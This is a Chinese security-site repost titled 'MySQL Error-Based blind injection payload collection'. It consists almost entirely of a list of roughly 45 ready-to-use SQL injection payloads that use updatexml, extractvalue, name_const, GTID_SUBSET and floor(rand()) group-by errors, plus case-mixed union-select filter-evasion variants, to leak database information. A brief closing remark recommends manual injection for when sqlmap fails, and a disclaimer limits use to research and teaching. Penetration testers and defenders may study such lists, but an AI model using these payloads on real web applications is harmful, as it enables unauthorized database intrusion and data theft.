MySQL Error-Based型盲注Payload大全

admin
admin
admin
140390
文章
117
评论
2021年9月4日06:24:42评论60 views字数 2663阅读8分52秒阅读模式

'-(select*from(select name_const(version(),1),name_const(version(),1))p)#

'=0 group by elt(rand(),version())having min(0)#

'/updatexml(0,concat(0xa,version()),0)#

'/updatexml(0,concat('$_',version()),0)#

'-updatexml(1,concat('a=.',version()),1)#

'-updatexml(1,LPAD(.1,999,hex(hex(version()))),1)#

'/polygon((select*from(select name_const(version(),1))o))#

'--~(select*from(select@@version)f)#

'-~(select*from(select@@version)x)*2#

1e308'*(select*from(select@@version)x)#

'-(select~b*a*a*a from(select~0/.1 a,version()b)x)#

'-GTID_SUBSET(@@version,0)#

'-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#

'=0 group by elt(rand(),version())having sum(0)#

'|updatexml(1,concat('a=.',version()),1)#

'|updatexml(0,concat('$_',version()),2)#

'-updatexml(0,concat(0x1,version()),2)#

'|polygon((select*from(select name_const(version(),1))x))#

'|updatexml(0,lpad(.1,350,hex(hex(version()))),1)#

1e308'*(select*from(select@@version)x)#

'--~(select*from(select@@version)f)#

'|(~(select*from(select@@version)f)*2)#

'|~(select*from(select@@version)x)*cast(1e99as decimal(65))#

'|GTID_SUBSET(@@version,0)#

'|(select*from(select name_const(version(),1),name_const(version(),1))a)#

'||1 group by mid(version(),rand())having min(1)#

'|UpdateXML(1,concat('/',version()),1)#

'|UpdateXML(1,concat('$_',version()),1)#

'|ExtractValue(1,concat('/a[x=y]',version()))#

'|Polygon((select*from(select name_const(version(),1))b))#

'|UpdateXML(0,CONCAT(hex(hex(version())),repeat(0,285),'.'),1)#

'|(select!x-~0.FROM(select+version()x)f)#

'|(select-9223372036854775808-(x||1)FROM(select+version()x)z)#

'|(select pow(2,~x)FROM(select+version()x)z)#

'|(select~0*cast(x as DECIMAL(1))*~0*~0*~0.FROM(select+version()x)z)#

'|GTID_SUBSET(version(),0)#

'||1 group by concat(left(version(),9),rand(0)|0) having max(0)#

'|(select!x-~0.FROM(select+version()x)f)#

'-updatexml(1,concat('.a=a',version()),1)#

'union select count(*)from test.news group by concat(version(),floor(rand(9)*3)),'

' UnIoN SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` group By CoNcAt(version(), rand(RaNd(4) * 2)), '

' union select count(*) From `test`.`news` where 1 group by concat(version(),floor(rand(1337)* 2)), '

'union all select count(*)from test.news where id=1 or 1=1 group by concat (version(),floor(rand(1337)*2)),'

' UnIoN AlL SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` WhErE 1 = 1 GrOuP By CoNcAt(VeRsIoN(), FlOoR(RaNd(1337) * 2)), '


小歪说道:盲注型注入在渗透过程中是很常见的,可以使用sqlmap来进行注入,但是,工具毕竟只是工具,有时会失效,所以掌握手工注入手法是很重要的,手工和工具结合是最有效的。

本文始发于微信公众号(关注安全技术):MySQL Error-Based型盲注Payload大全

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月4日06:24:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MySQL Error-Based型盲注Payload大全https://cn-sec.com/archives/503293.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息